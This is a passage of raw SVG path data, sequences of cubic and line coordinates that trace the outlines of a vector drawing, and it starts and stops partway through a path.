765.46482,223 C 766.92657,223 767.51092,223.67671 767.62364,225.5 C 767.69164,226.6 767.80414,227.97193 767.87364,228.54872 C 767.99894,229.58865 775.99074,229.99501 775.99683,228.96176 C 775.99857,228.66573 778.025,226.73083 780.5,224.66199 L 785,220.90046 L 785,223.57267 C 785,225.73783 784.73681,226.02646 783.61301,225.09379 C 782.51523,224.18271 781.65996,224.61541 779.51135,227.16888 C 777.336,229.75414 776.13649,230.35062 773.47359,230.17128 C 767.22054,229.75016 768.15018,233.36249 774.57092,234.43518 C 778.63131,235.11353 778.6453,235.10478 779.98315,231.05106 C 781.42905,226.66994 783.07576,226.19343 786.20716,229.25 C 787.19322,230.2125 788.9609,231 790.13533,231 C 791.30976,231 793.33693,232.15053 794.64015,233.55673 C 796.5317,235.59774 796.79987,236.50543 795.96964,238.05673 C 795.39764,239.12553 794.47574,240 793.92098,240 C 793.36622,240 793.04455,240.7875 793.20616,241.75 C 793.40378,242.92694 792.84507,243.50602 791.5,243.51837 C 790.07883,243.53143 789.52298,244.18262 789.5794,245.76837 C 789.62343,247.0058 789.06219,248 788.31961,248 C 787.58306,248 786.20982,248.9 785.26797,250 C 784.32612,251.1 783.02867,252 782.38475,252 C 781.74082,252 780.95496,252.675 780.63837,253.5 C 780.32179,254.325 778.94482,255 777.57844,255 C 774.42693,255 770.00612,256.9843 769.9802,258.41052 C 769.95729,259.67073 758.60319,265.05927 752,266.94373 C 749.525,267.65006 746.59204,268.64677 745.48231,269.15863 C 744.37259,269.6705 742.48808,270.16286 741.29452,270.25277 C 738.44961,270.46707 737.73595,273.45106 740.03254,275.52945 C 741.71911,277.05577 742.54636,277.02865 751.67406,275.14782 C 757.07833,274.03423 762.625,272.84088 764,272.49594 C 766.30301,271.91819 766.50575,272.14576 766.57292,275.38397 C 766.61303,277.31732 766.27553,278.67029 765.82292,278.39056 C 765.37032,278.11083 764.9926,278.69602 764.98355,279.69098 C 764.9745,280.68594 763.87222,283.3 762.53403,285.5 C 761.19584,287.7 758.99816,291.53391 757.65029,294.0198 C 755.32126,298.31525 748.42606,305.31414 742.53283,309.3646 C 741.04073,310.39013 737.76323,313.87763 735.2495,317.1146 C 732.73576,320.35157 730.18878,323.01465 729.58954,323.03257 C 728.09511,323.07723 724.73144,330.40813 726.00933,330.83541 C 726.56105,331.01989 726.69668,331.68177 726.31072,332.30627 C 725.23127,334.05285 725.02646,342.10168 726.078,341.45179 C 726.5851,341.13839 727,341.35852 727,341.94098 C 727,342.52344 726.54143,343 725.98095,343 C 724.65174,343 725.84244,348.17691 727.47733,349.50596 C 728.20166,350.0948 728.9204,354.03401 729.21067,359.00596 C 729.83066,369.62541 727.65531,373.95597 720.92889,375.49287 C 719.51477,375.81597 716.98735,377.29976 715.3124,378.79017 C 713.63745,380.28057 711.43713,381.98789 710.4228,382.5842 C 708.6853,383.60567 708.66631,383.98361 710.09473,389.11559 C 712.23538,396.8065 711.17009,400.237 706.01193,402.26318 C 703.22037,403.35973 701.96198,404.47195 701.875,405.91955 C 701.80625,407.0638 701.6375,408.45 701.5,409 C 701.3625,409.55 701.19375,410.70037 701.125,411.55637 C 701.05625,412.41237 699.70481,414.32487 698.1218,415.80637 C 696.53879,417.28787 694.62629,419.65854 693.8718,421.07452 C 690.02755,428.28922 677.95927,434.90085 669.5,434.42665 C 667.3,434.30333 663.28082,434.83188 660.5685,435.60121 C 657.85617,436.37055 655.60617,436.95213 655.5685,436.89362 C 655.53082,436.83511 654.36113,436.33293 652.96917,435.77766 z M 660.5,434.27237 C 661.6,433.96688 665.00876,433.61044 668.07503,433.48029 C 679.92929,432.97712 689.36524,427.99574 693.4587,420.07986 C 694.30013,418.45271 695.86999,416.50405 696.94726,415.74949 C 699.18565,414.18167 701.51027,409 699.97525,409 C 699.43886,409 699,409.45 699,410 C 699,411.37362 697.72783,411.25269 695.56858,409.6738 C 693.39289,408.0829 694.2784,403.50912 696.59034,404.39629 C 698.54717,405.1472 698.41496,401.61257 696.30755,396.83602 C 694.93415,393.72313 694.09472,393 691.85461,393 C 688.72073,393 684,394.89952 684,396.16052 C 684,396.62223 683.37748,397 682.61663,397 C 681.85578,397 680.99791,397.9 680.71025,399 C 680.42259,400.1 679.47011,401 678.59362,401 C 677.71713,401 677,401.65917 677,402.46482 C 677,404.80088 673.53315,406.1532 670.50038,405.00014 C 667.09089,403.70386 666,403.7377 666,405.13976 C 666,406.83844 662.81876,408.93202 660.18261,408.9682 C 658.42838,408.99227 657.99756,408.57473 658.40978,407.25 C 658.70929,406.2875 658.52151,404.825 657.99248,404 C 657.31757,402.94749 657.02606,404.33261 657.01531,408.64301 C 657.00313,413.53156 656.64263,414.93928 655.25,415.53652 C 652.9649,416.5165 647.83779,416.08676 646.25,414.78216 C 644.28669,413.16902 644.78251,415.02115 648.02658,421.4185 C 649.88058,425.07461 650.79025,428.08551 650.40632,429.29515 C 649.65948,431.64825 654.64522,436.25026 657,435.38133 C 657.825,435.0769 659.4,434.57787 660.5,434.27237 z M 682.18123,420.95421 L 679.89628,418.82546 L 682.49966,416.41273 C 685.57883,413.55906 685.81685,413.52428 688.10382,415.59396 C 689.8825,417.20364 689.66001,420 687.75325,420 C 687.18523,420 686.21326,420.69367 685.59333,421.54148 C 684.59796,422.90273 684.19901,422.83406 682.18123,420.95421 z M 686.8278,419.16478 C 688.81922,417.6328 688.94592,417.2 687.70455,416.16976 C 685.21474,414.1034 680.89061,417.39596 682.55577,420.09024 C 683.35375,421.38139 684.17874,421.20267 686.8278,419.16478 z M 654.41821,414.39301 C 655.73252,413.88866 656,411.85946 656,402.39301 C 656,393.23797 656.27789,391 657.41467,391 C 658.45481,391 658.91812,389.27855 659.16467,384.4979 L 659.5,377.9958 L 655.95,377.9979 C 653.9975,377.99906 651.9725,377.5945 651.45,377.09888 C 650.16496,375.87996 628,375.05686 628,376.22806 C 628,377.09107 630.66974,382.05792 635.40258,390 C 636.54973,391.925 637.56087,395.075 637.64957,397 C 637.86299,401.63182 639.96063,410.16496 641.29126,411.81429 C 641.91304,412.58498 643.3129,412.8873 644.6758,412.54523 C 646.34405,412.12653 647,412.39061 647,413.48095 C 647,415.05832 651.3051,415.58762 654.41821,414.39301 z M 697.12656,405.72656 C 696.37857,404.97857 695.8654,405.18718 695.38707,406.43371 C 694.9788,407.49763 695.26446,408.54945 696.10428,409.07459 C 697.83277,410.15542 698.70355,407.30355 697.12656,405.72656 z M 664.76426,405.34907 C 666.52879,402.92675 666.9696,402.79375 669.87584,403.80687 C 673.51445,405.0753 676,404.46347 676,402.29939 C 676,401.48174 676.9,400.57741 678,400.28975 C 679.1,400.00209 680,399.16973 680,398.44005 C 680,397.71037 681.89037,395.98608 684.20083,394.60829 L 688.40166,392.10321 L 685.70083,391.07636 C 684.21537,390.51159 683,389.46271 683,388.74551 C 683,387.58424 682.07659,386.66466 678.44721,384.21158 C 677.86818,383.82021 676.34616,381.77558 675.06495,379.66796 C 673.1865,376.57787 672.32543,375.96298 670.61773,376.49221 C 669.45298,376.85317 666.5875,377.60153 664.25,378.15524 L 660,379.16197 L 660,385.58098 C 660,390.62011 659.67755,392 658.5,392 C 656.4219,392 656.48403,400.28289 658.5862,403.49121 C 659.4586,404.82267 659.88205,406.38184 659.52718,406.95602 C 658.0733,409.30845 662.97586,407.80414 664.76426,405.34907 z M 700.54632,406.14593 C 700.08579,404.69494 700.99512,403.75412 704.72893,401.81843 C 709.34846,399.42357 709.4985,399.20453 709.4528,394.92219 C 709.42684,392.48963 709.00866,389.59951 708.52352,388.49968 C 706.91445,384.85193 707.25795,383.27884 710.01979,381.64738 C 711.52357,380.75908 714.20504,378.67674 715.97863,377.01996 C 717.75222,375.36318 719.57131,374.23505 720.02105,374.51301 C 720.47079,374.79096 721.55004,374.3071 722.41938,373.43776 C 723.28872,372.56842 724,372.17497 724,372.56343 C 724,372.95189 724.90726,372.11632 726.01614,370.70661 C 728.8108,367.15378 728.60746,353.83667 725.69757,349.84318 C 724.45838,348.14252 723.78308,345.63429 723.82118,342.87376 C 723.85391,340.50184 723.41774,338.00334 722.8519,337.32155 C 722.28606,336.63975 722.1151,334.75244 722.47199,333.12753 C 722.99674,330.73837 722.7438,330.05346 721.1499,329.54758 C 720.06586,329.20352 718.45557,327.81804 717.57147,326.46874 C 714.93054,322.43817 706.95545,319 700.24715,319 L 694.42782,319 L 694.54817,322.62731 C 694.63216,325.15865 693.96324,327.01564 692.33426,328.77333 C 689.33037,332.01459 689.38275,335.00161 692.52466,339.63148 C 695.32653,343.76026 699.23892,346.48658 704.21019,347.77445 C 706.78888,348.4425 707.60977,349.25902 708.00783,351.55189 C 708.45948,354.15341 708.96022,354.50816 712.5336,354.75818 C 714.74346,354.9128 718.76893,354.37197 721.4791,353.55633 C 728.02439,351.58648 728.51305,352.33671 722.07707,354.4744 C 719.2982,355.39739 715.00869,356.0286 712.54482,355.87709 C 710.08095,355.72557 707.73225,355.93442 707.32548,356.34119 C 706.54702,357.11965 710.96937,366 712.13549,366 C 712.9671,366 712.06372,369.64857 710.4729,372.71487 C 709.32675,374.92409 709.25073,374.93453 707.59923,373.10965 C 706.52573,371.92344 706.11532,370.36587 706.48148,368.86759 C 706.93837,366.99805 706.51419,366.25039 704.46503,365.3134 C 702.32513,364.33493 701.11143,364.45196 697.54515,365.98064 C 692.68282,368.06488 690.87363,370 693.78734,370 C 696.29075,370 701.68095,372.71821 702.26379,374.27457 C 702.5162,374.94856 702.34492,378.65 701.88319,382.5 C 701.18572,388.31553 700.59525,389.86208 698.39362,391.6398 C 695.79581,393.73742 695.77566,393.84394 697.37178,397.04344 C 698.2673,398.83855 699,402.03814 699,404.15364 C 699,406.26914 699.48032,408 700.06739,408 C 700.65445,408 700.86997,407.16567 700.54632,406.14593 z M 699.79484,388.27431 C 700.02543,387.29844 700.3592,384.68267 700.53655,382.46149 C 700.7139,380.24031 700.94402,377.99031 701.04793,377.46149 C 701.71975,374.04223 698.63512,371.621 692.22816,370.53855 C 688.79791,369.95901 688,370.11114 688,371.34471 C 688,372.181 687.15935,373.13204 686.13188,373.45814 C 685.10442,373.78425 683.45968,374.93957 682.4769,376.02553 C 681.47584,377.13169 679.40746,378 677.77358,378 C 675.12227,378 675,378.14286 676.42857,379.57143 C 677.29286,380.43571 678,381.53527 678,382.01489 C 678,382.49451 679.35,383.68439 681,384.65907 C 682.65,385.63375 684,387.16216 684,388.05555 C 684,389.56657 688.03941,391.36569 693.5,392.28678 C 695.98555,392.70604 699.23746,390.63321 699.79484,388.27431 z M 664.79733,376.14642 C 665.83355,375.4891 665.78323,375.06499 664.54733,374.03928 C 663.44985,373.12845 663,370.91943 663,366.44091 L 663,360.12672 L 666.25,359.81336 C 669.12481,359.53618 669.5,359.15367 669.5,356.5 C 669.5,354.85 669.05,353.57086 668.5,353.65747 C 667.95,353.74408 666.60775,353.96908 665.51722,354.15747 C 664.03902,354.41283 663.45041,353.86378 663.20427,352 C 662.78478,348.82356 662.28637,344.43643 662.125,342.5 C 662.05625,341.675 661.1,341 660,341 C 658.9,341 658,340.53417 658,339.96482 C 658,339.26773 657.33764,339.28412 655.97199,340.01499 C 654.85659,340.61194 654.17908,341.48074 654.46642,341.94567 C 654.75376,342.4106 653.21339,342.96031 651.04338,343.16725 C 647.31501,343.52281 647.00431,343.33597 645.39708,339.77176 L 643.69625,336 L 637.34813,336 C 633.85666,336 631,336.21589 631,336.47976 C 631,336.74363 631.74174,338.81333 632.64832,341.07908 C 633.82101,344.00994 633.97503,345.3974 633.18209,345.88746 C 632.38668,346.37905 632.48739,347.38555 633.53377,349.40245 C 635.58533,353.35684 635.40678,357.71193 633.14344,358.92323 C 631.23092,359.94678 627.46178,371.15766 628.29877,373.33317 C 628.59134,374.09362 632.53563,374.61536 639.62384,374.83124 C 645.60573,375.01342 650.9275,375.57592 651.45,376.08124 C 652.62676,377.2193 663.02595,377.27008 664.79733,376.14642 z M 684.75992,373 C 687.04946,370.8 689.61511,369 690.46136,369 C 691.30761,369 692,368.58722 692,368.08271 C 692,367.5782 694.03503,366.38823 696.52229,365.43834 C 699.00956,364.48844 700.85068,363.51735 700.61369,363.28035 C 700.37669,363.04336 700.62308,361.42083 701.16122,359.67473 C 702.52604,355.24631 702.98463,350.58595 702.17928,349.32892 C 701.18035,347.76974 693.3868,344 691.16228,344 C 690.10772,344 688.78544,344.5625 688.22388,345.25 C 685.97204,348.0069 686.82256,361.84573 689.15523,360.40406 C 689.71708,360.05682 689.62463,359.25264 688.92611,358.41097 C 687.99989,357.29495 688.09426,357 689.37756,357 C 690.4415,357 691,357.86059 691,359.5 C 691,361.10606 690.4381,362 689.42857,362 C 687.43995,362 684.68894,359.31232 685.43762,358.10093 C 685.74845,357.598 685.10214,357.42204 684.00138,357.70989 C 682.90062,357.99775 682,357.77291 682,357.21025 C 682,356.64759 681.09688,356.42341 679.99306,356.71207 C 678.88924,357.00072 676.62482,356.67302 674.961,355.98384 C 671.44907,354.52916 671.08227,354.73527 670.78472,358.33051 C 670.59391,360.63602 670.1163,361 667.28189,361 L 664,361 L 664,366.97695 C 664,372.15368 664.31585,373.16084 666.3591,374.49963 C 667.6566,375.34979 669.42926,375.77251 670.29836,375.439 C 671.16745,375.1055 672.69336,375.30661 673.68926,375.88591 C 677.24624,377.95494 680.48081,377.11175 684.75992,373 z M 711,368.92461 C 711,366.66722 708.94286,362 707.94789,362 C 706.78913,362 705.79532,356.80468 706.76802,355.83198 C 708.15842,354.44158 706.97284,349 705.27951,349 C 704.36281,349 704.00832,349.5793 704.36163,350.5 C 704.67821,351.325 704.55039,352 704.07758,352 C 703.60477,352 703.37055,353.575 703.5571,355.5 C 703.74364,357.425 703.5221,359 703.06477,359 C 702.60744,359 702.01633,359.82957 701.75118,360.84348 C 701.23654,362.81149 703.79115,365 706.60301,365 C 707.8328,365 708.10702,365.65982 707.71957,367.68662 C 706.99333,371.48575 707.84335,373.37489 709.61678,371.90308 C 710.37755,371.2717 711,369.93138 711,368.92461 z M 685.56457,353.50753 C 685.92492,351.58667 685.97838,349.38603 685.68336,348.61722 C 684.97248,346.7647 688.56184,343 691.03896,343 C 693.52545,343 693.51566,341.92527 691,338.72713 C 689.9,337.32871 689,334.90255 689,333.33567 C 689,331.76879 688.5862,329.04396 688.08044,327.28049 C 686.92515,323.25221 689.85339,312.84941 693.12194,309.3702 C 694.39854,308.01132 694.81881,307 694.10693,307 C 693.33116,307 693.09733,306.26871 693.48376,305.05115 C 694.37766,302.23474 690.88552,299.07534 687.32935,299.48315 C 685.77321,299.6616 683.825,299.23071 683,298.52561 C 681.248,297.02824 675.17534,295.99645 674.77441,297.12803 C 674.62348,297.554 672.90849,298.06357 670.9633,298.26041 C 669.01812,298.45726 666.76839,299.02511 665.9639,299.52231 C 663.90126,300.79709 658.82166,300.10597 656.76876,298.27123 C 655.36114,297.0132 654.75361,296.95959 653.51876,297.98443 C 652.68344,298.67768 652,300.22479 652,301.42244 C 652,302.6201 651.5649,304.0351 651.03311,304.56689 C 650.50132,305.09868 649.85319,307.70911 649.59283,310.36785 C 649.15682,314.82035 645.56008,321.97668 643.75,321.99317 C 643.3375,321.99693 643,323.10182 643,324.44848 C 643,325.79514 641.9359,328.04514 640.63533,329.44848 C 638.0949,332.18965 636.00947,332.77327 635.98469,330.75 C 635.97263,329.76561 635.80315,329.76169 635.18707,330.73156 C 634.7568,331.40891 633.50616,331.79006 632.40788,331.57855 C 631.00876,331.3091 630.36808,331.76365 630.26765,333.09699 C 630.13944,334.79897 630.85889,335 637.07833,335 L 644.03236,335 L 645.70139,338.5 C 647.01456,341.25374 647.95999,342 650.13552,342 C 651.65633,342 653.26048,341.38395 653.70031,340.63099 C 654.73322,338.86273 659,337.49536 659,338.93261 C 659,339.51968 659.9,340 661,340 C 662.29167,340 663.04427,340.70833 663.125,342 C 663.23751,343.8001 663.48925,346.12473 664.19643,351.89378 C 664.41217,353.65372 666.23411,353.6448 669.09631,351.8698 C 669.42427,351.66641 670.44765,352.12663 671.37047,352.8925 C 672.29329,353.65838 673.31603,354.0173 673.64321,353.69012 C 673.9704,353.36293 674.92421,353.78136 675.7628,354.61995 C 676.68848,355.54562 678.18916,355.91836 679.58247,355.56866 C 680.8447,355.25186 682.15657,355.44431 682.49773,355.99633 C 683.70218,357.94517 684.91701,356.95932 685.56457,353.50753 z M 987,342.8 C 987,342.36 985.9125,342 984.58333,342 C 983.25417,342 982.0018,341.50541 981.8003,340.90091 C 981.32057,339.46171 975,336.81032 975,338.04827 C 975,339.36147 967.25158,339.25474 966.81183,337.93549 C 966.30792,336.42377 958,335.41763 958,336.86833 C 958,337.49075 958.6375,338 959.41667,338 C 960.19583,338 960.99155,338.47466 961.18494,339.05481 C 961.37832,339.63495 964.00332,340.51566 967.01827,341.01193 C 970.03322,341.5082 974.3,342.28619 976.5,342.74081 C 981.62348,343.79956 987,343.82986 987,342.8 z M 724.78776,331.86329 C 724.53811,331.11434 724.08482,331.56764 723.73121,332.91984 C 723.29624,334.58319 723.42638,334.97362 724.16845,334.23155 C 724.74955,333.65045 725.02824,332.58473 724.78776,331.86329 z M 957.02936,329.5 C 957.60622,325.14115 956.61539,322.82662 954.51723,323.63176 C 953.72849,323.93443 952.87992,323.19279 952.44688,321.82232 C 952.04329,320.54504 950.85945,318.89925 949.81613,318.16499 C 948.51123,317.24665 948.12387,316.1851 948.57499,314.76372 C 949.11572,313.06004 948.90881,312.82101 947.39588,313.40158 C 946.38667,313.78885 945.87743,313.78924 946.26422,313.40245 C 947.1844,312.48226 942.12923,307.80209 940.98138,308.51151 C 940.49717,308.81077 939.11447,307.72127 937.90871,306.0904 C 936.70296,304.45953 934.43024,302.59242 932.85822,301.94127 C 931.2862,301.29012 930,300.15279 930,299.41386 C 930,297.82591 926.35803,295.66069 925.04843,296.47007 C 924.5478,296.77947 923.85554,296.57528 923.51008,296.01631 C 922.70233,294.70934 921,294.69828 921,296 C 921,297.20753 924.6643,301 925.83102,301 C 926.28808,301 927.23761,302.07547 927.94109,303.38993 C 928.64457,304.70439 930.20179,306.30522 931.40159,306.94733 C 932.60139,307.58944 933.64451,308.93089 933.71965,309.92833 C 933.79478,310.92577 934.97242,312.94622 936.33663,314.41822 C 937.70083,315.89022 939.59745,318.7608 940.55132,320.79729 C 942.80542,325.6097 951.49022,333.66437 954.32473,333.57137 C 956.09083,333.51343 956.59957,332.7476 957.02936,329.5 z M 632,330 C 632.89254,330.55162 633.9783,330.43576 634.87908,329.6928 C 636.00994,328.76006 636.42228,328.78848 636.77033,329.82313 C 637.42446,331.76769 641.99582,327.19477 642.01597,324.57569 C 642.02476,323.43406 643.37476,320.97652 645.01597,319.11449 C 646.65719,317.25246 648.02583,315.45246 648.0574,315.11449 C 648.72171,308.00297 649.20761,305.39239 650.0177,304.5823 C 651.64128,302.95872 651.14765,302.39807 648.25,302.57459 C 644.33348,302.81316 643.98723,302.91143 644.10815,303.75 C 644.16763,304.1625 643.90478,305.45657 643.52402,306.62571 C 642.91875,308.48425 642.38715,308.65116 639.29453,307.95366 C 635.67557,307.13745 633,307.5879 633,309.01337 C 633,309.45303 633.9,309.57741 635,309.28975 C 636.5348,308.88839 637,309.25907 637,310.88337 C 637,312.04752 636.53417,313 635.96482,313 C 635.25124,313 635.25124,313.60093 635.96482,314.93426 C 637.23642,317.31028 637.2787,321.01111 636.0563,322.94314 C 635.34793,324.06275 634.62043,324.14809 632.81134,323.32381 C 630.35262,322.20354 628.5,323.24609 628.5,325.75 C 628.5,327.98822 626.55278,326.56616 626.42836,324.23707 C 626.36187,322.99246 626.53439,322.20106 626.81173,322.4784 C 627.08907,322.75573 627.89112,322.50533 628.59407,321.92193 C 629.41871,321.23754 630.51571,321.19267 631.68608,321.79548 C 635.54949,323.78534 637.43041,320.26332 634.77504,316.01139 C 633.80843,314.4636 633.80843,313.79157 634.77504,312.82496 C 636.63399,310.96601 636.24148,309.78858 634,310.5 C 632.44024,310.99505 632,310.6797 632,309.06739 C 632,307.43696 631.36593,307 629,307 C 626.46667,307 626,307.38889 626,309.5 C 626,311.51537 625.50393,312 623.44098,312 C 622.03352,312 621.11047,312.36973 621.38976,312.82162 C 621.66904,313.27351 620.99565,314.41547 619.89334,315.35929 C 618.5549,316.50531 618.09981,317.7391 618.52333,319.07351 C 619.47139,322.06059 628.33178,330.74924 629.53354,329.87031 C 630.10198,329.45456 631.21189,329.51292 632,330 z M 726.97776,324.37244 C 726.98999,323.75229 727.60095,322.74615 728.33545,322.13657 C 729.32147,321.31824 729.55032,318.94547 729.21008,313.06806 C 728.82516,306.4187 729.0371,304.82004 730.49715,303.36 C 732.16098,301.69616 732.15499,301.57841 730.37251,300.91109 C 729.30777,300.51248 727.54146,300.81387 726.27798,301.60975 C 724.35362,302.82194 723.4829,302.7924 719.77798,301.38926 C 717.42509,300.49816 713.81067,299.5486 711.74592,299.27912 C 707.66746,298.74681 703.9278,299.66682 705.54838,300.80379 C 707.04008,301.85035 709.38324,307.29174 709.07782,309 C 708.93032,309.825 708.17747,310.85986 707.40482,311.29969 C 706.63217,311.73952 706,313.41944 706,315.03284 C 706,317.51589 706.72934,318.34906 710.75,320.45906 C 716.45903,323.4551 719,325.37958 719,326.70743 C 719,327.25025 720.0125,328.16568 721.25,328.74173 C 723.10265,329.60412 723.80512,329.41036 725.22776,327.64454 C 726.17803,326.46504 726.96553,324.9926 726.97776,324.37244 z M 692.86432,324.91614 C 692.2137,324.51404 690.96556,324.45266 690.09068,324.77975 C 688.69893,325.30009 688.67636,325.15777 689.91021,323.64172 C 690.68583,322.68871 691.92333,322.14034 692.66021,322.42311 C 693.3971,322.70587 694,322.35135 694,321.63528 C 694,319.73039 693.12137,319.1555 691.04134,319.69944 C 688.87168,320.26682 687.98834,323.73617 689.18789,326.97889 C 690.01331,329.2102 690.09499,329.22401 692.04245,327.46159 C 693.46954,326.17009 693.70638,325.43656 692.86432,324.91614 z M 738.88239,312 C 742.1892,308.975 746.9849,304.71574 749.5395,302.53497 C 752.0941,300.35421 755.29351,296.52921 756.64929,294.03497 C 758.00506,291.54074 760.19236,287.68715 761.50994,285.47144 C 762.82752,283.25573 764.20874,279.54678 764.57932,277.22934 L 765.25309,273.01581 L 762.37654,273.9719 C 760.79444,274.49775 755.59134,275.64102 750.8141,276.5125 C 743.65394,277.81868 741.76562,277.87058 740.0641,276.80796 C 738.92884,276.09898 738,275.17715 738,274.75945 C 738,274.34175 737.64643,274 737.21429,274 C 736.78214,274 736.42857,274.98824 736.42857,276.19608 C 736.42857,279.71276 741.31032,283.52034 747.72488,285.00679 C 750.9012,285.74283 753.69863,286.50355 753.94141,286.69727 C 754.18418,286.89098 751.94955,289.51335 748.97557,292.52474 C 745.51348,296.03038 742.73398,298 741.24898,298 C 738.55975,298 734.25496,300.4691 731.77224,303.43558 C 729.97887,305.57838 729.37796,314.07269 730.67638,318.92626 C 731.27568,321.16647 731.38467,321.20481 732.09773,319.42626 C 732.52248,318.36682 735.57558,315.025 738.88239,312 z M 699.08179,318 C 704.78406,318 705,317.90541 705,315.40773 C 705,313.98198 705.87546,311.7025 706.94546,310.34221 C 708.8549,307.91475 708.85609,307.8117 707.01005,304.77613 C 705.28834,301.94501 700,299.79756 700,301.92955 C 700,302.36576 698.93805,302.51965 697.64011,302.27154 C 695.8881,301.93662 695.14269,302.34637 694.74627,303.86226 C 694.4526,304.98527 694.72705,306.08895 695.35616,306.31488 C 696.07456,306.57286 695.68791,307.61353 694.31661,309.11282 C 690.58925,313.18808 688.71099,319.70862 691.58179,318.60699 C 692.45177,318.27314 695.82677,318 699.08179,318 z M 625,309.5 C 625,308.56667 624.05556,308 622.5,308 C 620.07213,308 619.30706,308.97373 620.66667,310.33333 C 621.92464,311.59131 625,310.9999 625,309.5 z M 951,308.43426 C 951,308.1231 950.48083,306.89844 949.8463,305.7128 C 949.21176,304.52716 948.74739,302.09951 948.81436,300.31803 C 948.96754,296.24331 946.68502,293.83667 943.25683,294.45832 C 941.56296,294.76547 940.21253,294.33519 939.35132,293.21391 C 938.26942,291.80531 938.2716,292.31296 939.36354,296.06375 C 941.17468,302.28497 942.04363,303.63714 946.04692,306.46378 C 949.49944,308.90153 951,309.4985 951,308.43426 z M 642,305.57713 C 642,305.05561 641.06242,303.63089 639.91649,302.41111 C 636.69461,298.98158 635.88369,293.79581 638.11539,290.89328 C 640.5779,287.69055 640.46495,286.39104 637.5,283.81305 C 634.29393,281.02541 634.29749,279 637.50847,279 C 639.76771,279 639.89269,278.80102 638.7663,276.99739 C 637.13941,274.39234 635.87894,274.87392 633.8425,278.8786 C 632.93088,280.67132 631.46838,282.92996 630.5925,283.89779 C 629.71663,284.86562 628.98569,286.29705 628.9682,287.07874 C 628.89934,290.15608 624,293.96724 624,290.94346 C 624,289.38517 618.21502,293.06977 617.72608,294.93948 C 617.49704,295.81533 617.65834,297.42475 618.08454,298.51597 C 618.51073,299.60719 618.90537,300.05 618.96152,299.5 C 619.01767,298.95 619.71461,299.36026 620.51027,300.41169 C 621.30594,301.46312 621.71813,303.27488 621.42625,304.43783 C 620.91094,306.49098 621.20148,306.5519 631.44778,306.53882 C 637.42237,306.5312 642,306.11401 642,305.57713 z M 643.53101,304.05017 C 642.85526,302.95679 646.06891,301 648.54034,301 C 649.45984,301 651.09708,299.875 652.17866,298.5 C 654.42261,295.64728 655.30389,295.44675 657.21183,297.35469 C 659.2311,299.37396 664.80289,299.95604 665.47006,298.21742 C 665.79002,297.38362 666.68822,297.05012 667.63518,297.4135 C 668.52525,297.75505 669.85175,297.538 670.58294,296.93116 C 671.31414,296.32432 672.35101,296.0989 672.8871,296.43022 C 673.42319,296.76154 674.09808,296.65031 674.38687,296.18304 C 674.67566,295.71577 676.28176,295.53451 677.95597,295.78023 C 679.793,296.04985 681,295.78548 681,295.1135 C 681,294.50107 680.325,294 679.5,294 C 678.675,294 678.1125,293.63365 678.25,293.1859 C 678.63454,291.93367 672.70937,286.35992 670.11999,285.53808 C 668.40838,284.99484 667.95582,284.27696 668.35724,282.74192 C 669.01163,280.23952 667.43943,277 665.57057,277 C 664.82309,277 662.76633,278.35 661,280 C 659.23367,281.65 657.03542,283 656.115,283 C 655.19459,283 653.79284,283.9 653,285 C 652.20716,286.1 650.60782,287 649.44591,287 C 648.28399,287 647.03405,287.29928 646.66827,287.66507 C 646.30248,288.03085 644.77327,288.46127 643.27001,288.62154 C 637.65409,289.22029 636.23918,296.00266 640.55089,301.65561 C 642.85904,304.68175 644.96929,306.37736 643.53101,304.05017 z M 726.37323,300.51784 C 727.5136,299.65427 729.36738,299.32348 731.11155,299.67231 C 732.91991,300.03398 734.89004,299.64684 736.45314,298.62266 C 737.81521,297.7302 739.97488,297 741.25241,297 C 742.7055,297 745.35626,295.19173 748.33216,292.17041 L 753.08913,287.34081 L 747.34215,285.96213 C 741.07334,284.45827 734.52389,279.68312 735.44342,277.28686 C 735.84225,276.2475 735.45541,276.03807 733.99371,276.502 C 731.75126,277.21372 731.29488,275.18605 732.98622,272.02575 C 733.78782,270.52795 733.29565,269.58876 730.3571,267.00868 C 726.9814,264.04478 726.36919,263.87027 721.12088,264.37598 C 718.0294,264.67386 715.1625,264.93613 714.75,264.95879 C 714.3375,264.98146 714.08916,265.3375 714.19813,265.75 C 714.59091,267.2369 712.89443,270.82653 711.55623,271.34005 C 710.80403,271.6287 709.88454,273.24919 709.51292,274.94116 C 709.14131,276.63312 708.45215,277.77945 707.98147,277.48855 C 707.51078,277.19765 706.72583,278.88122 706.23712,281.22982 C 705.74051,283.61643 704.83059,285.38973 704.17428,285.25 C 702.21788,284.83349 702.84122,285.99552 706,288.65345 C 707.65,290.04184 709,291.82691 709,292.62028 C 709,293.41365 709.675,294.32179 710.5,294.63837 C 711.325,294.95496 712,295.78835 712,296.49036 C 712,297.19237 712.7875,298.01464 713.75,298.31764 C 714.7125,298.62064 717.3,299.55337 719.5,300.39038 C 724.39162,302.25144 724.09133,302.24587 726.37323,300.51784 z M 705.18023,299.28284 C 705.76579,298.57728 707.31479,298 708.62244,298 C 709.9301,298 711,297.55 711,297 C 711,296.45 710.58032,296 710.06739,296 C 709.55445,296 708.86609,295.15345 708.5377,294.11878 C 707.74338,291.6161 704.54911,288 703.1327,288 C 701.50988,288 701.73098,285.04046 703.4017,284.39935 C 704.17264,284.10351 705.08455,282.36285 705.42817,280.53121 C 705.77178,278.69958 706.71602,276.65065 707.52646,275.97804 C 708.33691,275.30543 709,274.27671 709,273.69201 C 709,273.1073 709.98016,271.58557 711.17812,270.3104 C 712.42202,268.98633 713.48387,266.3852 713.6538,264.24594 C 714.30139,256.0934 715.0823,254.16696 718.17677,253.08822 L 721.14456,252.05365 L 718.57228,249.48137 C 717.00311,247.9122 716,245.7888 716,244.03633 C 716,238.0424 716.64785,238.22109 694.43338,238.08778 L 674,237.96516 L 674,241.48258 C 674,243.94251 673.54903,245 672.5,245 C 671.3,245 671,246.5 671,252.5 C 671,259.20476 670.79831,260 669.09783,260 C 667.87156,260 666.7572,261.15484 665.96173,263.25 C 663.94519,268.56134 663.99626,269.10463 667.10005,275.36037 C 668.73696,278.65958 669.86405,281.9119 669.6047,282.58776 C 669.3405,283.27625 670.20319,284.08516 671.56657,284.42735 C 672.90496,284.76327 674,285.46139 674,285.97875 C 674,286.4961 675.8,288.58481 678,290.62033 C 680.2,292.65584 682,294.87584 682,295.55364 C 682,297.1472 684.78253,298.35448 688.18876,298.2388 C 689.66758,298.18858 691.41389,298.79378 692.06945,299.58368 C 693.56264,301.38287 703.62906,301.15188 705.18023,299.28284 z M 559,296.04969 C 559,294.97702 558.22374,293.66496 557.27498,293.13401 C 555.44437,292.10955 554.87728,287.94973 556.41667,286.83798 C 557.90135,285.76573 557.47061,280.7387 